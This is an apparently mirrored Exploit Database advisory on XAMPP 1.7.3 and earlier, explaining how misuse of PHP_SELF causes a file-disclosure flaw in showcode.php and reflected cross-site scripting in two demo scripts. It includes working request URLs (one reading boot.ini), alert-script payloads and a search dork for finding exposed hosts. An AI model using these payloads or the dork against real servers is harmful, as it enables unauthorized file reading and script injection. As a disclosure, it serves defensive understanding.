XAMPP 1.7.3 – Multiple Vulnerabilities

• Exploit Database
• 44 阅读

• 作者： TheLeader
  日期： 2010-11-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15370/

• # _ ___________ 
  #(_)____ _ __/ __ \/ /_________/ /_/_/ |
  # / // __ \ | / / / / / //_/ _ \/ __// / / /
  #/ // / / / |/ / /_/ / ,< /__/ /_/ // / / / 
  # /_//_/ /_/|___/\____/_/|_|\___/\__,_// /_/_/
  # Live by the byte |_/_/
  #
  # Members:
  #
  # Pr0T3cT10n
  # -=M.o.B.=-
  # TheLeader
  # Sro
  # Debug
  #
  # Contact: inv0ked.israel@gmail.com
  #
  # -----------------------------------
  #
  # Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilites
  # Date: 31/10/2010
  # Author: TheLeader
  # Software Link: http://www.apachefriends.org/en/xampp-windows.html
  # Affected Version: 1.7.3 and prior
  # Tested on Windows XP Hebrew, Service Pack 3
  # ISRAEL, NULLBYTE.ORG.IL
  #
  # -----------------------------------
   
  I. File disclosure
  
  XAMPP is vulnerable to a remote file disclosure attack.
  The vulnerability exists within the web application supplied with XAMPP.
  
  http://[host]/xampp/showcode.php/c:boot.ini?showcode=1
  
  showcode.php:
  <?php
   echo '<br><br>';
   if ($_REQUEST['showcode'] != 1) {
   echo '<a href="https://www.exploit-db.com/exploits/15370/'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
   } else {
   $file = file_get_contents(basename($_SERVER['PHP_SELF']));
   echo "<h2>".$TEXT['global-sourcecode']."</h2>";
   echo "<textarea cols='100' rows='10'>";
   echo htmlspecialchars($file);
   echo "</textarea>";
   }
  ?>
  
  showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.
  What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file.
  basename() parses the last element of that path using "/" as a delimiter.
  
  Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter.
  Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory.
  
  II. Cross Site Scripting
  
  http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
  http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>
  
  It is interesting to see the same programming error lead to another security vulnerability.
  Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms.
  This can be exploited to perform Cross Site Scripting attacks.
  
  biorhythm.php (line 75):
  <form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  
  dork: "inurl:xampp/biorhythm.php"